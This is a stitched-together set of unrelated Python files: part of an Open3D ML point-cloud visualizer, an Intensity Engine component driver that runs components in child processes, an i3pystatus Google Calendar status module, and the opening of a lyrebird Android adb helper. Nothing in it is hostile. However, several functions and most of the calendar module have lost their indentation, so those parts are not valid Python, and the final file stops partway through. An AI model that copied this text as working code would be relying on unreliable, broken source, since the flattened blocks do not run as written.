    for n, tcloud in self._objects.tclouds.items():
        self._update_point_cloud(n, tcloud, material)
        if not tcloud.is_empty():
            # Loaded: green tree label; refresh material if already added.
            self._name2treenode[n].label.text_color = gui.Color(
                0.0, 1.0, 0.0, 1.0)
            if self._3d.scene.has_geometry(n):
                self._3d.scene.modify_geometry_material(n, material)
        else:
            # Not loaded: red label and uncheck so it is not drawn.
            self._name2treenode[n].label.text_color = gui.Color(
                1.0, 0.0, 0.0, 1.0)
            self._name2treenode[n].checkbox.checked = False
    self._3d.force_redraw()
def _update_point_cloud(self, name, tcloud, material):
    """Push scalar and color arrays for one cloud into the renderer.

    No-op while self._dont_update_geometry is set or the cloud is empty.
    """
    if self._dont_update_geometry:
        return
    if tcloud.is_empty():
        return

    attr_name = self._datasource_combobox.selected_text
    attr = None
    flag = 0
    attr = self._objects.get_attr(name, attr_name)

    # Update scalar values
    if attr is not None:
        if len(attr.shape) == 1:
            scalar = attr
        else:
            # Multi-channel attribute: use the selected channel.
            channel = max(0, self._colormap_channel.selected_index)
            scalar = attr[:, channel]
    else:
        # Attribute missing for this cloud: zeros keep shading valid.
        shape = [len(tcloud.point["points"].numpy())]
        scalar = np.zeros(shape, dtype='float32')
    tcloud.point["__visualization_scalar"] = Visualizer._make_tcloud_array(
        scalar)
    flag |= rendering.Scene.UPDATE_UV0_FLAG

    # Update RGB values
    if attr is not None and (len(attr.shape) == 2 and attr.shape[1] >= 3):
        # Normalize by the user-selected max value ("255" or "1.0").
        max_val = float(self._rgb_combo.selected_text)
        if max_val <= 0:
            max_val = 255.0
        colors = attr[:, [0, 1, 2]] * (1.0 / max_val)
        tcloud.point["colors"] = Visualizer._make_tcloud_array(colors)
        flag |= rendering.Scene.UPDATE_COLORS_FLAG

    # Update geometry
    if self._3d.scene.scene.has_geometry(name):
        self._3d.scene.scene.update_geometry(name, tcloud, flag)
    else:
        self._3d.scene.add_geometry(name, tcloud, material)
        node = self._name2treenode[name]
        if node is not None:
            self._3d.scene.show_geometry(name, node.checkbox.checked)
def _get_material(self):
    """Build a rendering.Material matching the current shader selection."""
    self._update_gradient()
    mat = rendering.Material()

    shader_name = self._shader.selected_text
    if shader_name == self.SOLID_NAME:
        mat.shader = "unlitSolidColor"
        color = self._color.color_value
        mat.base_color = [color.red, color.green, color.blue, 1.0]
    elif shader_name == self.COLOR_NAME:
        mat.shader = "defaultUnlit"
        mat.base_color = [1.0, 1.0, 1.0, 1.0]
    else:
        # Every colormap/label shader renders via the precomputed gradient.
        mat.shader = "unlitGradient"
        mat.gradient = self._gradient
        mat.scalar_min = self._scalar_min
        mat.scalar_max = self._scalar_max

    return mat
def _update_bounding_boxes(self, animation_frame=None):
    """Create or refresh bounding-box line geometry in the scene.

    Args:
        animation_frame: In consolidated mode, when not None only the
            boxes belonging to that animation frame's geometry are shown.
    """
    # Pick a LUT for box colors: the only LUT if there is exactly one,
    # otherwise one registered under "labels" or "label", else None.
    if len(self._attrname2lut) == 1:
        # Can't do dict.values()[0], so have to iterate over the 1 element
        for v in self._attrname2lut.values():
            lut = v
    elif "labels" in self._attrname2lut:
        lut = self._attrname2lut["labels"]
    elif "label" in self._attrname2lut:
        lut = self._attrname2lut["label"]
    else:
        lut = None

    mat = rendering.Material()
    mat.shader = "unlitLine"
    mat.line_width = 2 * self.window.scaling

    if self._consolidate_bounding_boxes:
        name = Model.bounding_box_prefix.split("/")[0]
        boxes = []
        # When consolidated we assume bbox_data.name is the geometry name.
        if animation_frame is None:
            for bbox_data in self._objects.bounding_box_data:
                if bbox_data.name in self._name2treenode and self._name2treenode[
                        bbox_data.name].checkbox.checked:
                    boxes += bbox_data.boxes
        else:
            geom_name = self._animation_frames[animation_frame]
            for bbox_data in self._objects.bounding_box_data:
                if bbox_data.name == geom_name:
                    boxes = bbox_data.boxes
                    break
        # Rebuild the single consolidated line set from scratch.
        self._3d.scene.remove_geometry(name)
        if len(boxes) > 0:
            lines = BoundingBox3D.create_lines(boxes, lut)
            self._3d.scene.add_geometry(name, lines, mat)
        if name not in self._name2treenode:
            self._add_tree_name(name, is_geometry=False)
        self._3d.force_redraw()
    else:
        # Don't run this more than once if we aren't consolidating,
        # because nothing will change.
        if len(self._objects.bounding_box_data) > 0:
            if self._objects.bounding_box_data[
                    0].name in self._name2treenode:
                return
        for bbox_data in self._objects.bounding_box_data:
            lines = BoundingBox3D.create_lines(bbox_data.boxes, lut)
            self._3d.scene.add_geometry(bbox_data.name, lines, mat)
        for bbox_data in self._objects.bounding_box_data:
            self._add_tree_name(bbox_data.name, is_geometry=False)
        self._3d.force_redraw()
def _update_gradient(self):
    """Rebuild self._gradient from the label LUT or the active colormap."""
    if self._shader.selected_text == self.LABELS_NAME:
        colors = self._label_edit.get_colors()
        n = float(len(colors) - 1)
        if n >= 1:
            # One LUT entry per label, evenly spaced over [0, 1].
            self._gradient.points = [
                rendering.Gradient.Point(
                    float(i) / n, [
                        colors[i][0], colors[i][1], colors[i][2],
                        colors[i][3]
                    ]) for i in range(0, len(colors))
            ]
        else:
            # Fewer than two labels: fall back to a single magenta entry.
            self._gradient.points = [
                rendering.Gradient.Point(0.0, [1.0, 0.0, 1.0, 1.0])
            ]
        self._gradient.mode = rendering.Gradient.LUT
    else:
        cmap = self._colormaps.get(self._shader.selected_text)
        if cmap is not None:
            self._gradient.points = [
                rendering.Gradient.Point(
                    p.value, [p.color[0], p.color[1], p.color[2], 1.0])
                for p in cmap.points
            ]
            self._gradient.mode = rendering.Gradient.GRADIENT
def _update_geometry_colors(self):
material = self._get_material()
for name, tcloud in self._objects.tclouds.items():
if not tcloud.is_empty() and self._3d.scene.has_geometry(name):
self._3d.scene.modify_geometry_material(name, material)
self._3d.force_redraw()
def _update_datasource_combobox(self):
    """Refill the attribute combobox from the currently selected objects."""
    current = self._datasource_combobox.selected_text
    self._datasource_combobox.clear_items()
    available_attrs = self._get_available_attrs()
    for attr_name in available_attrs:
        self._datasource_combobox.add_item(attr_name)
    if current in available_attrs:
        # Preserve the user's choice when it is still available.
        self._datasource_combobox.selected_text = current
    elif len(available_attrs) > 0:
        self._datasource_combobox.selected_text = available_attrs[0]
    else:
        # If no attributes, two possibilities:
        # 1) no geometries are selected: don't change anything
        # 2) geometries are selected: color solid
        has_checked = False
        for n, node in self._name2treenode.items():
            if node.checkbox.checked and self._is_tree_name_geometry(n):
                has_checked = True
                break
        if has_checked:
            self._set_shader(self.SOLID_NAME)
def _update_shaders_combobox(self):
    """Refill the shader combobox based on the selected attribute.

    Vector attributes get the RGB shader; attributes with a registered
    LUT get the label shader; colormaps and solid are always offered.
    """
    current_attr = self._datasource_combobox.selected_text
    current_shader = self._shader.selected_text
    has_lut = (current_attr in self._attrname2lut)
    is_scalar = True
    selected_names = self._get_selected_names()
    # Shape is probed on the first selected object only; presumably all
    # selected objects share the attribute's shape.
    if len(selected_names) > 0 and len(
            self._objects.get_attr_shape(selected_names[0],
                                         current_attr)) > 1:
        is_scalar = False
    self._shader.clear_items()
    if not is_scalar:
        self._shader.add_item(self.COLOR_NAME)
    if has_lut:
        self._shader.add_item(self.LABELS_NAME)
        self._label_edit.set_labels(self._attrname2lut[current_attr])
    self._shader.add_item(self.RAINBOW_NAME)
    self._shader.add_item(self.GREYSCALE_NAME)
    self._shader.add_item(self.SOLID_NAME)
    if current_shader == self.LABELS_NAME and has_lut:
        self._set_shader(self.LABELS_NAME)
    elif is_scalar:
        self._set_shader(self.RAINBOW_NAME)
def _update_attr_range(self):
    """Recompute scalar min/max for the current attribute and channel."""
    attr_name = self._datasource_combobox.selected_text
    current_channel = self._colormap_channel.selected_index
    self._scalar_min, self._scalar_max = self._objects.get_attr_minmax(
        attr_name, current_channel)

    # Keep the colormap editor's axis labels in sync with the new range.
    if self._shader.selected_text in self._colormaps:
        cmap = self._colormaps[self._shader.selected_text]
        self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
def _set_shader(self, shader_name, force_update=False):
    """Switch the active shader and show its settings sub-panel.

    Args:
        shader_name: One of the *_NAME class constants.
        force_update: Re-apply even if shader_name is already selected.
    """
    # Disable channel if we are using a vector shader. Always do this to
    # ensure that the UI is consistent.
    if shader_name == Visualizer.COLOR_NAME:
        self._colormap_channel.enabled = False
    else:
        self._colormap_channel.enabled = True

    if shader_name == self._shader.selected_text and not force_update:
        return

    self._shader.selected_text = shader_name
    idx = self._shadername2panelidx[self._shader.selected_text]
    self._shader_panels.selected_index = idx

    if shader_name in self._colormaps:
        cmap = self._colormaps[shader_name]
        self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)

    self._update_geometry_colors()
def _on_layout(self, context):
    """Window layout callback: fixed-width panel on the right, 3D view fills the rest."""
    frame = self.window.content_rect
    em = context.theme.font_size
    panel_width = 20 * em
    panel_rect = gui.Rect(frame.get_right() - panel_width, frame.y,
                          panel_width, frame.height - frame.y)
    self._panel.frame = panel_rect
    self._3d.frame = gui.Rect(frame.x, frame.y, panel_rect.x - frame.x,
                              frame.height - frame.y)
def _on_arcball_mode(self):
    """Mouse-mode button: rotate the camera around the model."""
    self._3d.set_view_controls(gui.SceneWidget.ROTATE_CAMERA)

def _on_fly_mode(self):
    """Mouse-mode button: first-person fly navigation."""
    self._3d.set_view_controls(gui.SceneWidget.FLY)

def _on_reset_camera(self):
    """Re-center the camera on the selected geometries."""
    self.setup_camera()
def _on_dataset_selection_changed(self, item):
    """Tree selection callback: lazily load the clicked geometry."""
    name = self._treeid2name[item]
    if not self._is_tree_name_geometry(name):
        # Group nodes and bounding-box entries are not loadable.
        return

    def ui_callback():
        self._update_attr_range()
        self._update_geometry(check_unloaded=True)
        self._update_bounding_boxes()

    if not self._objects.is_loaded(name):
        self._load_geometry(name, ui_callback)
def _on_display_tab_changed(self, index):
    """Switch between the list view (tab 0) and the animation view (tab 1)."""
    if index == 1:
        # Animation mode: the checked objects become the frame sequence.
        self._animation_frames = self._get_selected_names()
        self._slider.set_limits(0, len(self._animation_frames) - 1)
        self._on_animation_slider_changed(self._slider.int_value)
        # _on_animation_slider_changed() calls _update_bounding_boxes()
    else:
        # Back to list mode: restore per-checkbox visibility.
        for name, node in self._name2treenode.items():
            self._3d.scene.show_geometry(name, node.checkbox.checked)
        self._update_bounding_boxes()
def _on_animation_slider_changed(self, new_value):
    """Show only the frame at the slider position and update the caption."""
    idx = int(new_value)
    for i in range(0, len(self._animation_frames)):
        self._3d.scene.show_geometry(self._animation_frames[i], (i == idx))
    self._update_bounding_boxes(animation_frame=idx)
    self._3d.force_redraw()
    self._slider_current.text = self._animation_frames[idx]
    # Widen the caption frame so a longer name is not clipped.
    r = self._slider_current.frame
    self._slider_current.frame = gui.Rect(r.x, r.y,
                                          self._slider.frame.get_right(),
                                          r.height)
def _on_start_animation(self):
    """Play button: start ticking frames; the button becomes "Stop"."""
    def on_tick():
        return self._on_animate()

    self._play.text = "Stop"
    self._play.set_on_clicked(self._on_stop_animation)
    self._last_animation_time = 0.0  # force an immediate first frame
    self.window.set_on_tick_event(on_tick)
def _on_animate(self):
now = time.time()
if now >= self._last_animation_time + self._animation_delay_secs:
idx = (self._slider.int_value + 1) % len(self._animation_frames)
self._slider.int_value = idx
self._on_animation_slider_changed(idx)
self._last_animation_time = now
return True
return False
def _on_stop_animation(self):
    """Stop button: cancel the tick handler; the button becomes "Play"."""
    self.window.set_on_tick_event(None)
    self._play.text = "Play"
    self._play.set_on_clicked(self._on_start_animation)
def _on_bgcolor_changed(self, new_color):
    """Apply the chosen background color to the 3D scene."""
    bg_color = [
        new_color.red, new_color.green, new_color.blue, new_color.alpha
    ]
    self._3d.scene.set_background(bg_color)
    self._3d.force_redraw()
def _on_datasource_changed(self, attr_name, idx):
    """Attribute combobox callback: rebuild channel list, range, shader.

    Args:
        attr_name: The newly selected attribute name.
        idx: Its index in the combobox (unused).
    """
    selected_names = self._get_selected_names()
    # Channel count is probed on the first selected object only.
    n_channels = 1
    if len(selected_names) > 0:
        shape = self._objects.get_attr_shape(selected_names[0], attr_name)
        if len(shape) <= 1:
            n_channels = 1
        else:
            n_channels = max(1, shape[1])
    current_channel = max(0, self._colormap_channel.selected_index)
    current_channel = min(n_channels - 1, current_channel)
    self._colormap_channel.clear_items()
    for i in range(0, n_channels):
        self._colormap_channel.add_item(str(i))
    self._colormap_channel.selected_index = current_channel

    self._update_attr_range()
    self._update_shaders_combobox()

    # Try to intelligently pick a shader.
    current_shader = self._shader.selected_text
    if current_shader == Visualizer.SOLID_NAME:
        pass
    elif attr_name in self._attrname2lut:
        self._set_shader(Visualizer.LABELS_NAME)
    elif attr_name == "colors":
        self._set_shader(Visualizer.COLOR_NAME)
    elif n_channels >= 3:
        self._set_shader(Visualizer.RAINBOW_NAME)
    elif current_shader == Visualizer.COLOR_NAME:  # vector -> scalar
        self._set_shader(Visualizer.RAINBOW_NAME)
    else:  # changing from one scalar to another, don't change
        pass

    self._update_geometry()
def _on_channel_changed(self, name, idx):
    """Channel combobox callback: new channel means new scalars and range."""
    self._update_attr_range()
    self._update_geometry()  # need to recompute scalars array

def _on_shader_changed(self, name, idx):
    """Shader combobox callback."""
    # _shader.current_text is already name, so we need to force an update
    self._set_shader(name, force_update=True)

def _on_shader_color_changed(self, color):
    """Solid-color edit callback."""
    self._update_geometry_colors()

def _on_labels_changed(self):
    """Label LUT edit callback."""
    self._update_geometry_colors()

def _on_colormap_changed(self):
    """Colormap edit callback: store the edited map for the active shader."""
    self._colormaps[
        self._shader.selected_text] = self._colormap_edit.colormap
    self._update_geometry_colors()

def _on_rgb_multiplier(self, text, idx):
    """RGB max-value combobox callback: colors must be renormalized."""
    self._update_geometry()
def _get_selected_names(self):
# Note that things like bounding boxes could be in the tree, and we
# do not want to include them in the list of things selected, even if
# they are checked.
selected_names = []
for n in self._objects.data_names:
if self._name2treenode[n].checkbox.checked:
selected_names.append(n)
return selected_names
def _get_available_attrs(self):
selected_names = self._get_selected_names()
return self._objects.get_available_attrs(selected_names)
def _is_tree_name_geometry(self, name):
return (name in self._objects.data_names)
@staticmethod
def _make_tcloud_array(np_array, copy=False):
    """Wrap a numpy array as an Open3D core Tensor, zero-copy when possible.

    Args:
        np_array: Source numpy array.
        copy: Force a copy even when the array is C-contiguous.
    """
    if copy or not np_array.data.c_contiguous:
        return o3d.core.Tensor(np_array)
    else:
        # Shares memory with np_array; caller must keep it alive.
        return o3d.core.Tensor.from_numpy(np_array)
def visualize_dataset(self,
                      dataset,
                      split,
                      indices=None,
                      width=1024,
                      height=768):
    """Visualize a dataset.

    Example:
        Minimal example for visualizing a dataset::

            import open3d.ml.torch as ml3d  # or open3d.ml.tf as ml3d

            dataset = ml3d.datasets.SemanticKITTI(dataset_path='/path/to/SemanticKITTI/')
            vis = ml3d.vis.Visualizer()
            vis.visualize_dataset(dataset, 'all', indices=range(100))

    Args:
        dataset: The dataset to use for visualization.
        split: The dataset split to be used, such as 'training'.
        indices: An iterable with a subset of the data points to visualize, such as [0,2,3,4].
        width: The width of the visualization window.
        height: The height of the visualization window.
    """
    # Setup the labels
    lut = LabelLUT()
    for val in sorted(dataset.label_to_names.values()):
        lut.add_label(val, val)
    self.set_lut("labels", lut)

    self._consolidate_bounding_boxes = True
    self._init_dataset(dataset, split, indices)
    self._visualize("Open3D - " + dataset.name, width, height)
def visualize(self,
              data,
              lut=None,
              bounding_boxes=None,
              width=1024,
              height=768):
    """Visualize a custom point cloud data.

    Example:
        Minimal example for visualizing a single point cloud with an
        attribute::

            import numpy as np
            import open3d.ml.torch as ml3d
            # or import open3d.ml.tf as ml3d

            data = [ {
                'name': 'my_point_cloud',
                'points': np.random.rand(100,3).astype(np.float32),
                'point_attr1': np.random.rand(100).astype(np.float32),
            } ]

            vis = ml3d.vis.Visualizer()
            vis.visualize(data)

    Args:
        data: A list of dictionaries. Each dictionary is a point cloud with
            attributes. Each dictionary must have the entries 'name' and
            'points'. Points and point attributes can be passed as numpy
            arrays, PyTorch tensors or TensorFlow tensors.
        lut: Optional lookup table for colors.
        bounding_boxes: Optional bounding boxes.
        width: window width.
        height: window height.
    """
    self._init_data(data)

    if lut is not None:
        self.set_lut("labels", lut)

    if bounding_boxes is not None:
        prefix = Model.bounding_box_prefix
        # Filament crashes if you have too many items, and anyway, hundreds
        # of items is unwieldy in a list. So combine items if we have too
        # many.
        group_size = int(math.floor(float(len(bounding_boxes)) / 100.0))
        if group_size < 2:
            # Few boxes: one tree entry per box.
            box_data = [
                Model.BoundingBoxData(prefix + str(bbox), [bbox])
                for bbox in bounding_boxes
            ]
        else:
            # Many boxes: chunk into groups of group_size; name each chunk
            # by the index range it covers.
            box_data = []
            current_group = []
            n = len(bounding_boxes)
            for i in range(0, n):
                current_group.append(bounding_boxes[i])
                if len(current_group) >= group_size or i == n - 1:
                    if i < n - 1:
                        name = prefix + "Boxes " + str(
                            i + 1 - group_size) + " - " + str(i)
                    else:
                        if len(current_group) > 1:
                            name = prefix + "Boxes " + str(
                                i + 1 - len(current_group)) + " - " + str(i)
                        else:
                            name = prefix + "Box " + str(i)
                    data = Model.BoundingBoxData(name, current_group)
                    box_data.append(data)
                    current_group = []
        self._objects.bounding_box_data = box_data

    self._visualize("Open3D", width, height)
def _visualize(self, title, width, height):
    """Build the UI, load all geometries, then run the GUI event loop."""
    gui.Application.instance.initialize()
    self._init_user_interface(title, width, height)

    # Threshold above which point clouds are downsampled for interaction.
    self._3d.scene.downsample_threshold = 400000

    # Turn all the objects off except the first one
    for name, node in self._name2treenode.items():
        node.checkbox.checked = False
        self._3d.scene.show_geometry(name, False)
    for name in [self._objects.data_names[0]]:
        self._name2treenode[name].checkbox.checked = True
        self._3d.scene.show_geometry(name, True)

    def on_done_ui():
        # Add bounding boxes here: bounding boxes belonging to the dataset
        # will not be loaded until now.
        self._update_bounding_boxes()

        self._update_datasource_combobox()
        self._update_shaders_combobox()

        # Display "colors" by default if available, "points" if not
        available_attrs = self._get_available_attrs()
        self._set_shader(self.SOLID_NAME, force_update=True)
        if "colors" in available_attrs:
            self._datasource_combobox.selected_text = "colors"
        elif "points" in available_attrs:
            self._datasource_combobox.selected_text = "points"

        # Batch the initial setup: suppress per-step renderer updates,
        # then do one full geometry update at the end.
        self._dont_update_geometry = True
        self._on_datasource_changed(
            self._datasource_combobox.selected_text,
            self._datasource_combobox.selected_index)
        self._update_geometry_colors()
        self._dont_update_geometry = False
        # _datasource_combobox was empty, now isn't, re-layout.
        self.window.set_needs_layout()

        self._update_geometry()
        self.setup_camera()

    self._load_geometries(self._objects.data_names, on_done_ui)
    gui.Application.instance.run()
|
component_driver.py
|
# Copyright 2010 Alon Zakai ('kripken'). All rights reserved.
# This file is part of Syntensity/the Intensity Engine, an open source project. See COPYING.txt for licensing.
import os, signal, threading, time
from multiprocessing import Process, Queue
from intensity.base import *
from intensity.logging import *
from intensity.signals import signal_component, shutdown
## A general framework for a component, run in a separate process
class ComponentDriver:
    """Drives a component in a child process and relays messages both ways.

    Commands reach the child through ``to_component`` as (command, params)
    tuples; replies come back on ``from_component`` as (RESPONSE.*, data)
    tuples and are dispatched by main_loop().
    """

    class RESPONSE:
        Callback = 0  # data is (callback_name, param) to run in-engine
        Error = 1     # data is an error message string shown to the user

    def __init__(self, name, component_main, keep_alive_always=False, keep_alive_when_outgoing=False):
        """Start the component process and the relay/keepalive threads.

        Args:
            name: Component identifier used to route incoming signals.
            component_main: Callable run in the child process; receives the
                (to_component, from_component) queues.
            keep_alive_always: Restart the child whenever it dies.
            keep_alive_when_outgoing: Restart only while messages are queued.
        """
        self.name = name
        self.component_main = component_main
        self.keep_alive_always = keep_alive_always
        self.keep_alive_when_outgoing = keep_alive_when_outgoing

        self.to_component = Queue()
        self.from_component = Queue()

        self.proc = None
        self.proc_counter = 0
        self.kickstart()

        thread = threading.Thread(target=self.main_loop)
        thread.daemon = True  # setDaemon() is deprecated
        thread.start()

        if self.keep_alive_always or self.keep_alive_when_outgoing:
            thread = threading.Thread(target=self.keepalive_loop)
            thread.daemon = True
            thread.start()

        signal_component.connect(self.receive, weak=False)

    def kickstart(self):
        """(Re)start the child process, tearing down any previous instance."""
        curr_proc_counter = self.proc_counter
        self.proc_counter += 1
        try:
            shutdown.disconnect(self.proc.dispatch_uid)
        except Exception:
            pass  # no previous process, or never connected
        try:
            self.proc.terminate()
        except Exception:
            pass  # no previous process, or already dead
        self.proc = Process(target=self.component_main, args=(self.to_component, self.from_component))
        self.proc.daemon = True
        self.proc.start()

        # Daemon flag seems not to work, so do this
        curr_proc = self.proc
        curr_proc.dispatch_uid = curr_proc_counter

        def terminate_proc(sender, **kwargs):
            if curr_proc.is_alive():
                try:
                    if WINDOWS:
                        curr_proc.terminate()
                    else:
                        os.kill(curr_proc.pid, signal.SIGKILL)  # Stronger method
                except Exception:
                    pass  # process died between the check and the kill

        shutdown.connect(terminate_proc, weak=False, dispatch_uid=curr_proc_counter)

    def main_loop(self):
        """Relay responses from the child process back into the engine."""
        while True:
            response_type, data = self.from_component.get()
            if response_type == ComponentDriver.RESPONSE.Callback:
                callback, param = data
                CModule.run_script('Tools.callbacks.tryCall("%s", "%s")' % (callback, param), 'component %s callback' % self.name)
            elif response_type == ComponentDriver.RESPONSE.Error:
                CModule.show_message('Error', 'Component %s: %s' % (self.name, data))

    def keepalive_loop(self):
        """Restart the child once a second if it died and policy allows."""
        while True:
            time.sleep(1.0)
            # Restart
            if not self.proc.is_alive() and (self.keep_alive_always or (self.keep_alive_when_outgoing and not self.to_component.empty())):
                self.kickstart()

    def receive(self, sender, **kwargs):
        """Signal handler: forward 'command|param1|param2...' to the child."""
        component_id = kwargs['component_id']
        data = kwargs['data']
        try:
            if component_id == self.name:
                parts = data.split('|')
                command = parts[0]
                params = '|'.join(parts[1:])
                self.to_component.put_nowait((command, params))
        except Exception as e:  # fixed: was Python 2 "except Exception, e"
            # Fixed: the message was built with '+' instead of '%', which
            # raised a TypeError instead of logging the real error.
            log(logging.ERROR, "Error in %s component: %s" % (self.name, str(e)))
        return ''
|
google_calendar.py
|
import datetime
import threading
import httplib2
import oauth2client
import pytz
from apiclient import discovery
from dateutil import parser
from googleapiclient.errors import HttpError
from i3pystatus import IntervalModule, logger
from i3pystatus.core.color import ColorRangeModule
from i3pystatus.core.util import user_open, internet, require
class GoogleCalendar(IntervalModule, ColorRangeModule):
    """
    Simple module for displaying the next Google Calendar event.

    Requires the Google Calendar API package - https://developers.google.com/google-apps/calendar/quickstart/python.
    Additionally requires the `colour`, `httplib2`, `oauth2client`, `pytz`, `apiclient` and `dateutil` modules.

    All top level keys returned by the Google Calendar API can be used as formatters. Some
    examples include:

    .. rubric:: Available formatters

    * `{kind}` — type of event
    * `{status}` — eg, confirmed
    * `{summary}` — essentially the title
    * `{remaining_time}` - how long remaining until the event
    * `{start_time}` - when this event starts
    * `{htmlLink}` — link to the calendar event
    """
# i3pystatus configuration: (option name, description) pairs.
settings = (
    ('format', 'format string'),
    ("credential_path", "Path to credentials"),
    ("skip_recurring", "Skip recurring events."),
    # Fixed typo: "Goggle API" -> "Google API".
    ("update_interval", "How often (in seconds) to call the Google API and update events"),
    ("days", "Only show events between now and this many days in the future"),
    ("urgent_seconds", "Add urgent hint when this many seconds until event startTime"),
    ("urgent_blink", "Whether or not to blink when the within urgent_seconds of event start"),
    ("start_color", "Hex or English name for start of color range, eg '#00FF00' or 'green'"),
    ("end_color", "Hex or English name for end of color range, eg '#FF0000' or 'red'"),
)
required = ('credential_path',)

# Configuration defaults.
format = "{summary} ({remaining_time})"
credential_path = None
interval = 1  # seconds between run() calls (display refresh)
skip_recurring = True
update_interval = 60  # seconds between Google API fetches
days = 1
urgent_seconds = 300
urgent_blink = False

# Runtime state (not user configuration).
color = None
service = None
credentials = None
display_event = None
last_event_refresh = None
urgent_acknowledged = False
update_lock = threading.Lock()  # guards background event fetches

on_rightclick = 'acknowledge'
on_leftclick = 'open_calendar'
def init(self):
self.colors = self.get_hex_color_range(self.end_color, self.start_color, self.urgent_seconds * 2)
self.last_event_refresh = datetime.datetime.now(tz=pytz.UTC) - datetime.timedelta(seconds=self.update_interval)
@require(internet)
def run(self):
if self.service is None:
self.connect_service()
now = datetime.datetime.now(tz=pytz.UTC)
if self.should_update(now):
threading.Thread(target=self.update_display_event, args=(now,), daemon=True).start()
self.refresh_output(now)
def should_update(self, now):
"""
Whether or not we should update events.
"""
wait_window = self.last_event_refresh + datetime.timedelta(seconds=self.update_interval)
if self.display_event is None:
should_update = wait_window < now
elif self.display_event['start_time'] < now:
should_update = True
elif wait_window < now:
should_update = True
else:
should_update = False
return should_update and not self.update_lock.locked()
def update_display_event(self, now):
"""
Call the Google API and attempt to update the current event.
"""
with self.update_lock:
logger.debug("Retrieving events...".format(threading.current_thread().name))
self.last_event_refresh = now
for event in self.get_events(now):
# If we don't have a dateTime just make do with a date.
if 'dateTime' not in event['start']:
event['start_time'] = pytz.utc.localize(parser.parse(event['start']['date']))
else:
event['start_time'] = parser.parse(event['start']['dateTime'])
if 'recurringEventId' in event and self.skip_recurring:
continue
elif event['start_time'] < now:
continue
# It is possible for there to be no title...
if 'summary' not in event:
event['summary'] = '(no title)'
if self.display_event:
# If this is a new event, reset the urgent_acknowledged flag.
if self.display_event['id'] != event['id']:
self.urgent_acknowledged = False
self.display_event = event
return
self.display_event = None
def refresh_output(self, now):
"""
Build our output dict.
"""
if self.display_event:
start_time = self.display_event['start_time']
alert_time = now + datetime.timedelta(seconds=self.urgent_seconds)
self.display_event['remaining_time'] = str((start_time - now)).partition('.')[0]
urgent = self.is_urgent(alert_time, start_time, now)
color = self.get_color(now, start_time)
self.output = {
'full_text': self.format.format(**self.display_event),
'color': color,
'urgent': urgent
}
else:
self.output = {
'full_text': "",
}
def is_urgent(self, alert_time, start_time, now):
"""
Determine whether or not to set the urgent flag. If urgent_blink is set, toggles urgent flag
on and off every second.
"""
urgent = alert_time > start_time
if urgent and self.urgent_blink:
urgent = now.second % 2 == 0 and not self.urgent_acknowledged
return urgent
def get_events(self, now):
"""
Retrieve the next N events from Google.
"""
events = []
try:
now, later = self.get_timerange_formatted(now)
events_result = self.service.events().list(
calendarId='primary',
timeMin=now,
timeMax=later,
maxResults=10,
singleEvents=True,
orderBy='startTime',
timeZone='utc'
).execute()
events = events_result.get('items', [])
except HttpError as e:
if e.resp.status in (500, 503):
logger.warn("GoogleCalendar received %s while retrieving events" % e.resp.status)
else:
raise
return events
def get_timerange_formatted(self, now):
"""
Return two ISO8601 formatted date strings, one for timeMin, the other for timeMax (to be consumed by get_events)
"""
later = now + datetime.timedelta(days=self.days)
return now.isoformat(), later.isoformat()
def get_color(self, now, start_time):
seconds_to_event = (start_time - now).seconds
v = self.percentage(seconds_to_event, self.urgent_seconds)
color = self.get_gradient(v, self.colors)
return color
def connect_service(self):
logger.debug("Connecting Service..")
self.credentials = oauth2client.file.Storage(self.credential_path).get()
self.service = discovery.build('calendar', 'v3', http=self.credentials.authorize(httplib2.Http()))
def open_calendar(self):
if self.display_event:
calendar_url = self.display_event.get('htmlLink', None)
if calendar_url:
user_open(calendar_url)
def acknowledge(self):
self.urgent_acknowledged = True
|
android_helper.py
|
import os
import re
import sys
import time
import codecs
import lyrebird
import threading
import subprocess
from pathlib import Path
from . import config
from lyrebird.log import get_logger
"""
Android Debug Bridge command helper
Basic ADB command for device_service and API
"""
logger = get_logger()
# `adb devices` output lines to ignore when parsing the device list.
ignore_devices_line = ['\r']
here = os.path.dirname(__file__)
# Resolved path of the adb binary; populated by check_android_home().
adb = None
static = os.path.abspath(os.path.join(here, 'static'))
# Per-plugin storage layout: tmp/, anr/, crash/, screenshot/, apk/.
storage = lyrebird.get_plugin_storage()
tmp_dir = os.path.abspath(os.path.join(storage, 'tmp'))
anr_dir = os.path.abspath(os.path.join(storage, 'anr'))
crash_dir = os.path.abspath(os.path.join(storage, 'crash'))
screenshot_dir = os.path.abspath(os.path.join(storage, 'screenshot'))
apk_dir = Path(storage)/'apk'
# Eagerly create the directories we write to (screenshot_dir is created
# lazily in Device.take_screen_shot). exist_ok avoids the check-then-create
# race of the original three copy-pasted `if not exists: makedirs` blocks.
for _dir in (tmp_dir, anr_dir, crash_dir):
    os.makedirs(_dir, exist_ok=True)
class ADBError(Exception):
    """Raised when an adb command fails or its output cannot be parsed."""
    pass
class AndroidHomeError(Exception):
    """Raised when the ANDROID_HOME environment variable is missing or invalid."""
    pass
def check_adb_cmd():
    """Return True when a bare ``adb`` invocation produces no stderr output.

    An adb binary on PATH prints its help to stdout and nothing to stderr;
    a missing binary makes the shell complain on stderr.
    """
    completed = subprocess.run('adb', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return not completed.stderr
def check_android_home():
    """Resolve the adb binary into the module-global ``adb``.

    Prefers an adb already on PATH; otherwise falls back to the
    platform-tools directory under ANDROID_HOME.

    Raises:
        AndroidHomeError: ANDROID_HOME is unset, missing, or not a directory.
        ADBError: the platform is not win32/darwin/linux.
    """
    global adb
    if check_adb_cmd():
        adb = 'adb'
        return
    android_home = os.environ.get('ANDROID_HOME')
    if not android_home:
        raise AndroidHomeError('Environment variable ANDROID_HOME not found!')
    if not os.path.exists(android_home):
        raise AndroidHomeError('ANDROID_HOME %s not exists' % android_home)
    if not os.path.isdir(android_home):
        raise AndroidHomeError('ANDROID_HOME %s is not a dir' % android_home)
    if sys.platform == 'win32':
        adb_relpath = 'platform-tools/adb.exe'
    elif sys.platform in ('darwin', 'linux'):
        adb_relpath = 'platform-tools/adb'
    else:
        raise ADBError('Unsupported platform')
    adb = os.path.abspath(os.path.join(android_home, adb_relpath))
class App:
    """Metadata for one installed Android package, parsed from `dumpsys package`."""

    def __init__(self, package):
        self.package = package
        self.launch_activity = None
        self.version_name = None
        self.version_code = None
